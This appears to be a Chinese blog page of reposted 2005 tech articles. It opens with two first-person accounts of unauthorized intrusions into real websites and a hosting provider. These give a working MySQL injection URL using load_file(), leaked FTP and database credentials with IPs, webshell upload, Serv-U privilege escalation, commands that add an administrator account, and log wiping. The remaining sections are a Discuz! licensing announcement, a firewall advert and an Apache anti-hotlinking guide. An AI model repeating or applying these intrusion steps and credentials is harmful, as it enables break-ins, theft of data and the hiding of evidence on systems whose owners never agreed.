呵呵,工夫不负有心人,还真让我找到了一个。直接在url的id后加’如图1。哈哈,知道了是windows主机,还有绝对路径,呵呵!再判断1=1与1=2返回的页面基本知道漏洞存在。可是不知道支不支持union啊,马上在后面依次递增提交and 1=2 union select到20的时候返回正常页面如图2。哈哈!高兴Ing!根据显示的字段显示,9那个地方是软件介 绍一定是字符的了,可以用load_file()替换了。由于已经知道这个下载系统的敏感文件globl.asp,config.inc.php,就分别读出来了。哈哈居然得到root的密码啊,如图3,顺利多了!还有默认的后台,可是表好象被改过了,不是默认的字段与表名了。可是我们有load_file()啊,读取那个/admin/user.php(就是得到的后台登陆),仔细观察几个读取数据的地方,果然有了表名和字段!马上union查询出用户密码登陆,如图4。后台有点简陋,根本没有上传的地方。可是没有关系,我们有root数据库密码啊!我有Root我怕谁?
初步成功,整理思路先(好象很简单啊,就是以前高手所做的简单重复嘛!但是……当然没这么简单了,不然也不会有这篇文章了)。有了Root等数据库密码,可以试试远程连接mysql,导出个webshell就不错了。也可以在浏览器提交,但是这里有个Php的设置问题,如果那个magic_qutoes_gpc=on为打开的话,浏览器提交给服务器的变量都会被处理的,备份webshell基本就不可能了(除非你浏览器里提交的路径不包含被过滤的字符,但好象是不可能的)。如果开了对管理员极为方便(当然也对我们)的Phpmyadmin,那也可以很简单的备份得到webshell!。
废话不说了,这么久还没有进行主机探测呢,现在该看看了。打开x-scan选择只扫开放服务,因为这些已经够了,不可能给你一些n年前的溢出吧,呵呵^_^。等了一会看结果,晕!只开了80,21端口。理想中的3306没有扫到,侥幸地telnet他的3306端口,(这台主机好象有措施防御扫描。)结果还是没有!郁闷!远程登陆不可能了!那就看看Php.ini的设置吧,猜测了几次Php.ini的位置,最后发现是c:\winnt\php.ini,转换下用load_file()读出来,果然是magic_qutoes_gpc=on如图5。那只有看看有没有Phpmyadmin了,于是找到他的ip,在后面加上Phpmyadmin/,这是Phpmyadmin的默认目录,但是,最后一丝希望也被毁灭了!果然不存在,返回404!
基本上的经典招式都用完了,我也晕了。我们注入只是得到了敏感的密码信息,一些敏感文件信息,主机已经屏蔽了3306端口,也不存在Phpmyadmin,没有办法数据库备份得到webshell了!菜鸟的入侵也已经山穷水尽。郁闷Ing!
中间就这样停了一段时间,甚至忘记了这次入侵。但是最近把以前的黑x拿出来温习,忽然看到紫幻大哥提到的关于serveru的远程管理缺陷。只要webshell读取ServUAdmin.ini加密密码就可以本地替换拿到serveru的远程管理权限。注意!是只要读到的权限就可以啊!想到什么没有,希望注入漏洞还在,哈哈,不用多说了,马上将C:\program files\Serv-U\ServUAdmin.ini转换成67,58,92,112,114,111,103,114,97,109,32,102,105,108,101,115,92,83,
101,114,118,45,85,92,83,101,114,118,85,65,100,109,105,110,46,105,110,105
放在load_file(char())函数里提交。可惜我们的运气不好啊,没有那个密码,不过注意到没有,我们本质上已经拿到了只读的系统权限的webshell啊!(嘿嘿,有点奇怪吧!)因为是mysql函数所以只有读取的权限,他读取时用的mysql服务的权限,当然是系统权限了!毫不犹豫,马上找其他的敏感信息存在的文件,读取C:\program files\Serv-U\ServUDaemon.ini得到了好多东西,如图6!有用户的敏感信息啊!得到了所有的用户名,我们可不可以根据已经得到的数据库的密码信息和后台密码等信息找个字典挂上去猜那个对网站目录有权限的www帐户的密码啊,猜到了不就可以上传php木马了。但是我没有,人家有防范的,我猜了一次就被封IP了^_^。不过这里有已经加密的密码,正好最近Hak_Ban给我了一个暴力server-u工具,只能猜数字密码,很快的哦~马上弄到肉鸡上跑密码!(尽管偶不喜欢暴力,但是运气好的话也很方便的,为什么不试试呢?)
暴力的同时我也没有闲着,马上用我们得到的另类只读webshell尽情的刺探系统!首先提交
view-source:http://www.asianheros.com/down/show.php?id=105%20and%201=2%20union
%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,92,119,101,98,92,97,104,99,115,
92,100,111,119,110,92,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19,20
也就是load_file()读取他的d:\web\ahcs\down\show.php,得到了一些好东西ftp://ahgame:ahgam
edown@61.241.130.38:33333/”.$downurl;
ftp://ahlt:ahlt@61.241.130.38:33333/”.$downurl;
“update $down_table SET downnum=”.$downnum.” where id=$id”;
等其他重要的信息。哈哈~~不过还有其他的啊,譬如那个flashftp的sites.dat的文件,不过目录很复杂,一般管理员也不会在网站上上传东西,有耐心的话可以找找,这些有安全缺陷的配置文件本身就是很大的突破口,这里提出来的意思就是不要局限于固定的思维,黑客不能缺乏想象力(不是我说的!)。呵呵,现在既然玩就要玩大啊!
现在看看站点本身,偶不玩单纯的Php注入了!前阵子旁注很流行,那我们也可以用load_file()这样玩玩啊!先进行一下信息的刺探!拿出域名查询工具(当时的黑站必备工具啊),得到了一些主机的信息,比较关心的是他有几个站点在上边!如图7,嘿嘿,域名很少啊!估计是自己的主机!有3个站,其他的站点里面也许有比较有意思的东东哦。随便找个,呵呵,又是Php的,马上找个有参数传递的页面进去,哈哈,又有个类似的下载系统,/show.php?id=305后加’暴出了路径,以为可以像前面一样union然后暴出内容呢,结果发现版本太低不支持union,一台主机怎么会两种结果?以前这时候会很郁闷,但是现在没关系了!我们有”只读webshell”呢,读出来他的配置文件发现数据库果然不在一个机器上!得到的敏感信息:
$dbhost = “61.241.x.31″; // 数据库主机名
$dbuser = “mxhah”; // 数据库用户名
$dbpasswd = “07448″; // 数据库密码
$dbname = “down”; // 数据库名
现在不想连上去,网站还有几个其他的模块呢!于是跑去读了一些文件的原代码,屡试不爽啊!已经没有敏感信息瞒得住我们的眼睛,整个主机上的文件因为这
个注入点的存在而没有任何安全性可言了。如果是虚拟主机的话,不说大家也知道会怎么样了。
已经刺探出这么多的信息了,发现数据库密码等很有规律哦,有兴趣的可以社会工程学试下,serveru的密码暴力中,整个系统的缺陷也慢慢呈现,得到一个shell什么的不是问题了!由于只是学习,入侵到这里也该结束了,因为是个大型站点,给管理员发了个邮件提示了一下走人了。
这次实践没有什么技术可言,若给你一点思路这文章就有存在的价值了。有大哥说过黑客不能缺乏想象力,有什么问题欢迎来x论坛讨论。(Su-Crack.exe暴力工具网站上有收录。)
分类 : 技术文摘 | 发表时间 16-12-2005
有天跟朋友谈起BLOG备案的问题,无意中提到了空间提供商IDC。说起IDC,没想到朋友还有段非常不愉快的经历。
事情是这样的:当时他也是没经验,想选个虚拟主机做网站,当然出于习惯问题,他对提供自己虚拟主机空间服务的这台服务器做了下安全检测,结果他拿到了空间提供商WEB目录的权限,于是……小小地给自己加了一年的时间。没想到被他空间提供商发现了,封闭了朋友的空间和FTP账号。后来他看了下,这个空间商竟然连电子经营许可证(ICP证)都没有!汗ing….
不过据说后来那台服务器增强了安全性,配置得还不错!既然你不仅不合法而且又得罪了偶那可爱得不能再可爱的朋友,那就免费给你做次安全检测吧!
废话不多说了,既然朋友认为他的安全性还可以,那系统扫描这档子事就根本没必要做了,直接看WEB安全性!找啊找啊找朋友,找到一个好朋友……晕!主站安全性确实还说得过去,过滤得很严格!再用 Domain 3.0 看了下。
晕,那么多虚拟主机跟自己的站放在一起——真会赚钱啊!好了,我们继续。导入网址进行路径扫描,扫出几个upfile.asp upload.asp,尝试上传,均告失败(这不奇怪,毕竟是很老的洞洞了)。既然这个不行,我们再看,告诉你我可是有的是耐心。
随便从 Domain 3.0 左边点了个站进去,是个在线购物站点,有ICP证!SORRY SORRY 我的目标不是你,只是借个WebShell用用而已!费了九牛二虎之力解释清楚之后,开始检测了……
首先找BBS——发现没有,不过倒是看到了个留言板,不错!就是你了,我们来看看。打开大致看了下,这个留言板简单得不能再简单了,尝试了几个“and 1=1”、“and 1=2”没发现问题。暴数据库路径也别想了,这个BT IDC已经全部做了错误处理,返回定制页,所以即使出错了也得不到有用信息(不过如果是MSSQL数据库在注入点将有办法解决这个问题)!这时候,目光落到了“搜索留言”上。赶紧打开,直觉告诉我这里有问题。
前面看到了一个留言,关键词是“人气”,那我们先在搜索栏里搜索一下“人气”,返回正常页面。
接着当我想构造检测语句的时候出了点小问题,查询框有字符长度限制。不过这个小CASE! 我们把当前页面的源码保存到本地,搜索Action找到如下语句:
原始代码:
——————————————————————————————
<FORM onsubmit=”return check(this)” action=searchresult.asp method=post>
<TABLE class=lybtable height=64 cellSpacing=0 cellPadding=0 width=650
align=center>
<TBODY>
<TR>
<TD width=”100%” height=64>
<DIV align=center><FONT color=#000000> <B> 查询方式:</B> <SELECT size=1
name=classid> <OPTION selected>留言内容</OPTION> <OPTION>回复内容</OPTION>
<OPTION>姓名</OPTION></SELECT> 关键字: <INPUT maxLength=12 size=28
name=keyword> <INPUT class=noborder accessKey=s type=submit value=查询(S) name=B1>
</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
—————————————————————————————–
我们这里需要改几个地方,把“action=searchresult.asp”改成“action=http://www.xxx.com/lyb/searchresult.asp”(这里我隐藏了原始地址,为了保护自己也为了保护该站点),当然啦,不能忘了改最重要的东西:“maxLength=12”改成 “maxLength=152”,修改后的代码如下:
——————————————————————————————
<FORM onsubmit=”return check(this)” action=http://www.xxx.com/lyb/searchresult.asp
method=post>
<TABLE class=lybtable height=64 cellSpacing=0 cellPadding=0 width=650
align=center>
<TBODY>
<TR>
<TD width=”100%” height=64>
<DIV align=center><FONT color=#000000> <B> 查询方式:</B> <SELECT size=1
name=classid> <OPTION selected>留言内容</OPTION> <OPTION>回复内容</OPTION>
<OPTION>姓名</OPTION></SELECT> 关键字: <INPUT maxLength=152 size=28
name=keyword> <INPUT class=noborder accessKey=s type=submit value=查询(S) name=B1>
</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
——————————————————————————————
好了,接下来我们就可以本地提交了!打开修改后的页面,在搜索栏里查询:“人气%’ and 1=1 and ‘%’='”——返回正常页面。
接着,我们尝试查询:“人气%’ and 1=2 and ‘%’='”——出错!果然有问题。
好了,既然找到了突破口,我们继续!手动猜太累了,交给 NBSI 2吧。我们构造如下 URL :http://www.xxx.com/lyb/searchresult.asp?classid=留言内容&keyword=人气,在关键词里输入正常页面里的一个词,我这里选“2005”,好了,GO!一声令下,NBSI 2飞快地运行了,没过多久,密码出来了。晕,MD5加密的,不过不要紧,一下子就破解出来了。
不用扫路径了,页面上直接就有管理员登录的链接,我们成功登录!不过情况不太乐观,后台功能实在是简单得不能再简单了,尝试获得一个WebShell别说还真不是件容易的事!思路一转,扫购物系统的后台(本来还想跟留言板一样直接找个管理员登录的链接的,无奈找不到)!扫描结果很不幸,后台路径我们无从知道!到这里难道就没办法了?办法不会没有,而是你找不到罢了!我们注意到了这里。
管理员资料里包括邮件账号,抱着试试看的态度,我尝试着登录该站管理员的邮箱——竟然成功!马上退出,想到什么了?对,FTP账号!用邮箱@前的账号和前面我们破解出来的密码成功连接上空间商的FTP!然后呢?当然是上传WebShell了!
马上传了个海洋2006网安中国zrrrshoo个人专用版,访问链接,没被查杀,成功。粗略看了下目录设置,标准的虚拟主机权限分配:每个空间独立运行,文件夹名为域名,不能遍历其它站点目录,CDE分区根目录一概无权限浏览!随手一个“net user”,不出所料,无法执行!尝试跳转到“c:\winnt\system32\inetsrv\data\”,成功了!上传一个改名了的cmd.exe,在海洋里指定路径“c:\winnt\system32\inetsrv\data\cmd.exe /c”执行命令—成功!“net start”,再次不出所料,服务器里果然有个Serv-U乖乖躺在那里,等着给我们提升权限。不过先别乐观,没成功之前什么都不确定!“netstat -an”:印入眼帘的包括一个“43958”,看来没想象中的复杂!接着目录跳转至“C:\Documents and Settings\All Users\「开始」菜单\程序\”找到Serv-U目录,进去下载快捷方式回来!知道了他的Serv-U安装路径:“D:\serv-U\”,看看能不能跳转进入—成功!又是老套路,写入新用户到“ServUDaemon.ini”准备走人的时候,竟然提示出错了!郁闷,看来是没有写权限……
不过一件令人大跌眼镜的事情发生了,本来以为应该有防火墙过滤除少数几个外的所有端口的,没想到上传 Fpipe后,转发的高端口能直接连接上,那还说什么,本地新建FTP域,远程连接管理,加用户,FTP上去“quote site exec net user zrrrshoo /add”;“quote site exec net user zrrrshoo zrrr”;“quote site exec net localgroup administrators zrrrshoo /add”,他有3389,我怕又做了登录限制,不过事实证明我的担心是多
余的!直接就登录进去了。好了,安全要紧,清除所有日志,再开个ChallengeCollapsar,用30个代理变换路径访问15分钟(主要是不让WEB日志空空如也),OK!明天把他交给朋友处理吧!
作者: 千顷云 (zrrrshoo)
来 源: 《黑客防线
分类 : 技术文摘 | 发表时间 12-12-2005
来自:http://www.cnbeta.com//modules.php?name=News&file=article&sid=9480
国内论坛程序界地震!:
Discuz! 从1月1日起最新版全部解密开源-免费提供任何人使用
对此国内论坛界众说纷纭,本人认为,可能和Zend被破解有关.
Update:Discuz! 4.0.0 Build 20051212发布
以下转自Dizcuz!引言
立足于社区,专注于社区.
自2001年Discuz!(前身CDB)问世以来,一直致力于为用户提供最专业、最高效的论坛系统软件,期间我们也走过一些弯路,经历过一些挫折,但我们始终以积极和执着的心态去面对每一次转型、每一次挑战,经历过每一次发展道路中的艰难险阻后,使我们变得更加坚强、更加专注.
2006年元旦即将到来之际,经过公司内部慎重讨论决定,Discuz!在产品研发、市场策略等方面将进行一系列重大的改变.
过去
2003 年,Discuz! 致力于由免费软件转型为专业的商业论坛系统提供商,诞生了博卡先锋公司,我们也开始了艰难的商业化进程.由于当时用户心态的非理性化、对商业产品的妖魔化和市场环境不成熟等因素,Discuz!2.0的开放源代码的销售策略一度使我们陷入严重的盗版和生存的危机中.我们不断思考,甚至也怀疑过过这件事情还是否有意义、值得继续做下去.当时甚至有数波人等,与我们联系勒索数额巨大的现金,以作为其不将源代码泄露出去的“封口费”.一时间忽然感觉众叛亲离,免费用户由于无法得到最新的软件版本,很多用户对我们怒目以对,甚至试图从道德、人性和人品的问题上去讨论我们将软件商业化的举措.在承受巨大精神压力的同时,商业用户又寥寥无几,项目运营收入几乎为0,Discuz!又面临生存压力.
转眼间几年过去,Discuz!已经成为网络软件商业化最成功的案例之一,在这段时间内,我们成功的拥有了数千家商业用户和数万家免费用户,成为了中文PHP论坛领域名至实归的领导者.我们于2003年底成立了 COMSENZ公司,并组建了一支有战斗力有亲和力的技术团队.事实上,如果没有用户对我们的信赖与支持,我们绝对不可能有资金和实力去组建这么一支高效的技术团队,Discuz!也绝对不可能有今天这样的规模.
Discuz!纵然曾经取得了一些成绩,但我们始终不认为Discuz!有多么的好,多么的完美,相反,战战兢兢、如履薄冰的感觉才使我们有能力走到现在,并一如既往的以饱满的热情将产品做的更好.
在我们最困难、商业价值尚未被认可的时候,138、55188、落伍、手机之家、BT之家等有影响力的网站纷纷转向Discuz!系统,Discuz!在大负载情况下表现出的优异的稳定性,使得用户逐渐接受了Discuz!的产品价值,我们开始了以产品销售为主业的发展历程.时过境迁,2004年中,随着商业用户数量的快速增长,我们将人性化设计和人性化服务定位为这一阶段的指导方针,我们配备了专业和细心的产品工程师,为用户解决论坛使用过程中出现的各种各样的疑难问题,一部分不属于我们服务范围内的技术难题,我们只要有条件,也都会把问题为用户解决好,专业的服务再次使我们赢得的良好的用户口碑,并为近两年销售全面飘红的业绩奠定了坚实的基础.总而言之,商业用户的信任、支持是我们顺利发展最重要和最中坚的支持力量,是用户的认可与鼓励,使我们很快的走入到良性发展的轨道.
改变
不容忽视的是,在我们大力推广商业版本,占领高端市场的同时,那些一直使用Discuz!免费版,为Discuz!免费版摇旗呐喊的免费用户,受当时市场策略和现实条件的约束,一直没有得到应有的重视与回报.
我们深知,虽然该版本非常经典和稳定,但依然是采用2003年技术的Discuz!旧版本.此前,我们一直在寻找一个时机,在不影响Discuz!发展的基础上,能够有足够的实力来回报免费用户一直以来的爱戴和支持.
今年,这个想法更加强烈了.
在十月份Discuz! 4.0.0发布暨国庆寄语中,我们曾经提到“在条件成熟的时候,作出一些大的改变”,这个看似平常的许诺,现在即将付诸行动.
近期,我们将与多家网站及媒体联合举办《第一届社区BBS发展现状调查》活动,启动Discuz!产品免费计划第一炮,任何用户无需付费,只要参与调查,并经审核通过,即可获得一套原Discuz! 4.0.0商业版软件产品,我们将对获得审批的用户提供后续版本升级和公开的交流论坛的服务,而以往使用非商业授权的4.0.0、2.5F、3.0F的用户,均可平滑升级到此版本.
而在2006年1月1日,Discuz!将会彻底开放原Discuz! 4.0.0商业版软件产品的下载,任何用户均可免费使用.
今后,Discuz!将只有一个版本,就是最新版,所有用户均使用这个版本,共享插件、风格、文档及其他相关资源.我们将整合免费版本团队和商业版本团队,减少原有不合理的或重复性的劳动,将为用户提供更完整、更统一和更丰富的Discuz!相关信息和资源.
对于商业用户
2005 年10月,Zend加密被破解事件以来,事实上,包括Discuz!在内的使用Zend SafeGuard Suite加密的软件均已被破解,而Discuz!作为PHP领域的领军产品,更是首当其冲.大量盗版的使用和讨论,与我们在2003年所遭遇的情况如出一辙.技术层面的变化使得加密在事实上已经没有意义,我们并不是没有新的加密方式,但我们认为,与其牺牲大量的用户兼容性,对用户平台作更严格的要求,倒不如以彻底改变商业模式的方式更有益于用户的利益.
纵然商业用户数量在近几年中取得了突飞猛进的增长,却仍远远无法与数以万计的免费用户群体相提并论.一个产品用户群扩大了,相关的插件、风格都会得到极大的丰富,我们希望这次免费计划,从根本上解决以往商业用户中一直存在的插件少、风格少、使用人群有限、交流资源少等问题.同时,由于团队的整合,我们也得以集中精力提供更多更好的官方资源,如知识库、产品支持和售后服务.因而,请大家相信,产品的免费带给大家的决不是冲击,而是更多的服务和保障.
可以预见到,当产品本身免费化之后,我们的产品销售收入必然随之减少,但我们愿意付出这样的成本来换取更多的用户满意.我们能够作出这样的决定,完全取决于商业用户在此前对我们的大力支持,你们为Discuz!所作出的决定性的不可替代的贡献,我们及所有Discuz!用户都将铭刻在心,并以更好的产品和服务,回报你们的厚爱和支持.
2005年12月12日以前的商业用户,无论购买年限如何,我们制定了一个老用户回报计划:
原精简型、经济型用户:统一升级至标准型用户;
原增强型用户:统一升级至VIP型用户;
原标准型、VIP型用户:延长服务时间至原来的2倍;
全部商业用户,免费升级年限均不再限制,即只要Discuz!产品推出任何新版本或新产品,均可以免费升级,同时具有优先和优惠得到我们研发的新产品的权力.
如果您有疑问,请联系grace#discuz.com,我们会尽可能解答您的问题.
对于免费用户
我们始终想说,
希望这次的改变没有让您等的太久.Discuz!在从1.0的免费过渡到2.0的收费时,曾经遭遇了巨大的阻力,一方面,我们感受到国内对软件知识产权认识的严重不足,另一方面,我们也看到了国内用户的社区软件产品需求是多么多么地强烈.
如今,随着我们商业化进程的推进,越来越多的人开始意识到软件中包含了大量他人的智慧和辛勤劳动,并愿意付费让著作权人得到回报.
很多人曾经质疑说加密是阻碍Discuz!发展的绊脚石,开源才是未来
的发展方向.
关于此方面的讨论,无论在我们的官方论坛还是在其他论坛,历来都是一个较为持久和激烈的话题.但我们认为,每个软件产品在每一个时期都有着当时的目标和使命,如果我们自身生存都有问题,那何谈研发更好的产品,回报更多的用户呢?
我们创业到今天,深刻地理解到,成本控制对于一个中小团队的重要性.如今,许多富有创意的中小网站迅速崛起,我们也希望,与有理想、有志向的网络创业人群结成一种互助、谅解的协作关系.我们愿意与更多的创业者共同分享之前我们所创造的价值,帮助他们实现更快的成长.
作为一个领先的社区软件提供商,我们之所以敢于第一个推出由收费到免费的转折策略,是因为我们始终坚持一个信念:在力所能及的范围内,适时的回报支持我们、关注我们的用户和爱好者们.同时,也希望大家和我们一起共同树立中国互联网产业的核心竞争力,实现我们的共同价值.
对于今后免费提供的软件,我们制定了如下的期望和要求:
1. 除经过我们授权外,不得用于商业用途,仅限个人网站、非盈利网站等使用.
2. 不承诺提供技术支持和服务,如果您自身不具备相应的技术经验,请联系我们购买商业服务.
3. 在本次的调查活动中,请如实完整的填写我们
的调查表格,这将有助于更快的获得审批.
对于已经发布的Discuz! 3.0F Beta版,由于版本计划的调整,将不再发布正式版,已经使用此版本的用户我们将提供完整的升级程序以供用户升级到最新的Discuz! 4.0.0,我们承诺将把3.0F中所具有的一些好的功能引进到未来的4.x中.
关于Discuz!的未来
无论您是哪种类型的用户,都无需担心我们因收入减少而可能发生的一些问题.我们在作出决定之前,经过了仔细的准备和论证,我们可以保证:
1. 我们有强大的研发团队,纵然前面的路还很长,但我们的脚步会更快;
2. 由于商业用户此前充分的支持和信任,使得我们有充足的资金预算作为支撑,不会因此而陷入困顿;
3. 我们会以全新的姿态和速度,为大家提供更多更好的软件产品,继续保持领先的优势,主导社区领域的发展.
4. 如果条件允许,也欢迎广大用户选购我们的虚拟主机等其他增值产品,以帮助我们开发更好的社区软件.
Discuz! 致力于为更多用户提供优质的互联网社区产品与服务,我们秉承“个性 创新 专业专注”的企业理念,相信一件事情、一个产品、一种服务可以做得更专业、更完善,这次的转变只是一个开始,我们将以百倍的努力去迎接未来的挑战,请相信, Discuz!的明天会更美好!
北京康盛世纪科技有限公司
执行董事 戴志康 敬上
2005年12月12日
—————————–
报道:lqy@cnBeta.COM
http://www.ipb.net.cn
—————————–
Discuz! 4.0.0 Build 20051212发布
此次发布的是Discuz! 4.0.0开源版本,除了API目录下一些合作的接口,出于对合作伙伴负责的态度仍然加密外,其他全部源代码均被提供.如果不使用相关的功能,API目录可以被删除而不影响非相关功能的使用.
此次发布的是Discuz! 4.0.0开源版本,除了API目录下一些合作的接口,出于对合作伙伴负责的态度仍然加密外,其他全部源代码均被提供.如果不使用相关的功能,API目录可以被删除而不影响非相关功能的使用.
今后Discuz!将不再区分商业版本和免费版本,共用最新版本,并且以开源的方式提供.其中:
2005年12月12日至2005年12月31日 参加《第一届社区BBS发展状况调查》,填写表单并通过审批后即可获得免费下载权限;
2006年1月1日之后 无需任何手续即可获得Discuz!产品免费下载权限.
产品免费后,技术支持仍然收取服务费用,详情请访问 http://www.discuz.com/?category=6.
免费用户不得将Discuz!用于商业用途,同时我们不承诺提供任何使用担保和技术支持,详情请访问 http://www.discuz.com/?category=5
Discuz! 3.0F到Discuz! 4.0.0的升级程序,已在程序包的./utilities中提供.
Discuz! 2.5F到Discuz! 4.0.0的直接升级程序,将在12日工作时间提供.
我们将在未来3天内在本版提供完整的适用于各种论坛、各种版本的转换程序,敬请关注.
分类 : 技术文摘 | 发表时间 12-12-2005
软件作者:SoftBug[E.S.T]
VIF是一个基于Windows IIS web服务器技术开发的准防火墙软件
界面友好,可视化的界面操作,帮助你迅速的建立起配置文件,快速搭建起IIS防火墙平台
支持虚拟主机式的操作方式,能用一个防火墙防护多个站点,支持主机头,支持多端口
内建稳定的防盗链服务,通过GUI界面快速保护的web资源不被盗用
防盗链服务支持多种方式的防盗链动作
防止GET方式的SQL注入攻击
其他有用的限制选项
高效的处理速度,一切多余的操作通通跳过,直接达到防的目的
支持Windows xp,windows 2000,windows 2003操作系统上面的IIS
防止类似CC软件的DDOS攻击 
下载地址:
官方上传下载
http://www.myiis.cn/download/virtualiis.rar
注意: 如果你的是2003的服务器请查看:
http://www.myiis.cn/firewallin2003.asp
商业版的价格和服务请参见:
http://www.myiis.cn/jiage.asp
商业版比个人版本有更多的好处:
1.全自动配置IIS,你不需要了解IIS更深入
2.支持 windows 2003系统,无任何时间功能限制
3.支持控制面版方式操作
4.支持虚拟主机用户自主配置VIF防火墙功能,让你的虚拟主机与众不同!让个人也可以办会员站
相关连接:
http://www.microie.net/
http://www.myiis.cn
如欲购买商业版请访问这里:
http://www.eviloctal.com/forum/read.php?tid=17148&page=1&toread=1
分类 : 技术文摘 | 发表时间 08-12-2005
作者:修理工
要让apache防盗连接,首先要让apache支持.htaccess客户设置文件,还要增加mod_rewrite模块。以下是我的编译安装过程。
1. 安装apache增加mod_rewrite模块
tar xfzv httpd-2.0.54.tar.gz
cd httpd-2.0.54
./configure –prefix=/usr/local/httpd –enable-module=most –enable- shared=max –enable-rewrite
–enable-rewrite将od_rewrite模块编译进来
make
make install
查看apache编译进来的模块
[root@TFP httpd-2.0.54]# /usr/local/httpd/bin/apachectl -l
Compiled in modules:
core.c
mod_access.c //支持.htaccess文件
mod_auth.c
mod_include.c
mod_log_config.c
mod_env.c
mod_setenvif.c
prefork.c
http_core.c
mod_mime.c
mod_status.c
mod_autoindex.c
mod_asis.c
mod_cgi.c
mod_negotiation.c
mod_dir.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_rewrite.c //已经将od_rewrite编译进来了
mod_so.c
[root@TFP httpd-2.0.54]#
2.设置apache配置文件httpd.conf
<Directory />
Options FollowSymLinks
AllowOverride All 将None修改为All
</Directory>
AllowOverride All 将None修改为All
修改默认APACHE名去掉#ServerName前的#设置为127.0.0.1
ServerName 127.0.0.1
设置虚拟主机
NameVirtualHost 220.202.19.82
<VirtualHost 220.202.19.82>
DocumentRoot /home/down
ServerName down.sy165.cn
</VirtualHost>
重启Apache2服务器
接下就是做一个 .htaccess 文件了,其 .htaccess 文件内容为
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://www.sy165.cn/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.sy165.cn$ [NC]
RewriteRule .*\.(jpg|jpeg|gif|png|bmp|rar|zip|exe)$ http://www.sy165.cn/err.htm [R,NC]
将这个文件放到/home/down目录下
RewriteCond % {HTTP_REFERER} !^http://www.sy165.cn/.*$ [NC]
只允许通过 www.sy165.cn/*才能下载down.sy165.cn下的文件。
RewriteCond %{HTTP_REFERER} !^http://www.sy165.cn$ [NC]
只允许通过www.sy165.cn才能下载down.sy165.cn下的文件
RewriteRule .* \.(jpg|jpeg|gif|png|bmp|rar|zip|exe)$ http://www.sy165.cn/err.htm [R,NC]
jpg|jpeg|gif|png|bmp|rar|zip|exe是要保护的内容,如果岛连接将跳转到http://www.sy165.cn/err.htm
测试地址可以通过 http://www.sy165.cn下载CS1.6 标准版3147版下载
不能直接通过URL:http://down.sy165.cn/game/CS_16_3174.exe 下载
